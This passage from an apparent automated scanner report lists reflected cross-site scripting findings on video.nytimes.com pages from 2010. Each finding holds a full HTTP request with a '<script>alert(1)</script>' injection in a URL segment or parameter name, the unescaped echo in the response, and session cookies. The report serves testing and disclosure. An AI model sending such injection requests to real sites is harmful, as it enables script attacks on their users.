Request

GET /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html?c36d9"><script>alert(1)</script>fa5d622a454=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:49:21 GMT
Content-type: text/html
Content-Length: 177072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html?c36d9"><script>alert(1)</script>fa5d622a454=1">
...[SNIP]...

3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/09/business/1248069304600/fed-move-not-enough.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26e0"><script>alert(1)</script>529cef00bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/09/business/1248069304600/fed-move-not-enough.html?b26e0"><script>alert(1)</script>529cef00bfb=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:45:09 GMT
Content-type: text/html
Content-Length: 229278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html?b26e0"><script>alert(1)</script>529cef00bfb=1">
...[SNIP]...

3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17445"><script>alert(1)</script>7d7efaf16f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html?17445"><script>alert(1)</script>7d7efaf16f5=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:40:53 GMT
Content-type: text/html
Content-Length: 233212

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html?17445"><script>alert(1)</script>7d7efaf16f5=1">
...[SNIP]...

3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3992"><script>alert(1)</script>b112273edd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010a3992"><script>alert(1)</script>b112273edd6/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:35:49 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010a3992"><script>alert(1)</script>b112273edd6/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 811e2"><script>alert(1)</script>be620c72320 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11811e2"><script>alert(1)</script>be620c72320/12/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:37:05 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11811e2"><script>alert(1)</script>be620c72320/12/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77af8"><script>alert(1)</script>c90cdf2058c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/1277af8"><script>alert(1)</script>c90cdf2058c/business/1248069282083/a-recovery-for-wall-street-pay.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:38:12 GMT
Content-type: text/html
Content-Length: 233617

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/1277af8"><script>alert(1)</script>c90cdf2058c/business/1248069282083/a-recovery-for-wall-street-pay.html">
...[SNIP]...

3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb846"><script>alert(1)</script>fa4db76b286 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html?bb846"><script>alert(1)</script>fa4db76b286=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:33:22 GMT
Content-type: text/html
Content-Length: 229479

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html?bb846"><script>alert(1)</script>fa4db76b286=1">
...[SNIP]...

3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b2b"><script>alert(1)</script>b0d5dbb082a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201080b2b"><script>alert(1)</script>b0d5dbb082a/11/12/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:36:41 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201080b2b"><script>alert(1)</script>b0d5dbb082a/11/12/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e762"><script>alert(1)</script>df2270cfe8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/111e762"><script>alert(1)</script>df2270cfe8/12/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:37:21 GMT
Content-type: text/html
Content-Length: 233623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/111e762"><script>alert(1)</script>df2270cfe8/12/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b90"><script>alert(1)</script>e339d715d3b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12e8b90"><script>alert(1)</script>e339d715d3b/business/1248069321928/straining-to-make-mid-market-deals.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:38:15 GMT
Content-type: text/html
Content-Length: 233625

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12e8b90"><script>alert(1)</script>e339d715d3b/business/1248069321928/straining-to-make-mid-market-deals.html">
...[SNIP]...

3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed67"><script>alert(1)</script>da4ae9fb45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html?fed67"><script>alert(1)</script>da4ae9fb45=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:33:52 GMT
Content-type: text/html
Content-Length: 229315

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html?fed67"><script>alert(1)</script>da4ae9fb45=1">
...[SNIP]...

3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9d1"><script>alert(1)</script>b4e18d5e19f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html?ec9d1"><script>alert(1)</script>b4e18d5e19f=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:34:21 GMT
Content-type: text/html
Content-Length: 230446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html?ec9d1"><script>alert(1)</script>b4e18d5e19f=1">
...[SNIP]...

3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.nytimes.com
Path:   /video/2010/11/12/world/1248069321921/timescast-november-12-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77337"><script>alert(1)</script>1a269a3367e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/12/world/1248069321921/timescast-november-12-2010.html?77337"><script>alert(1)</script>1a269a3367e=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
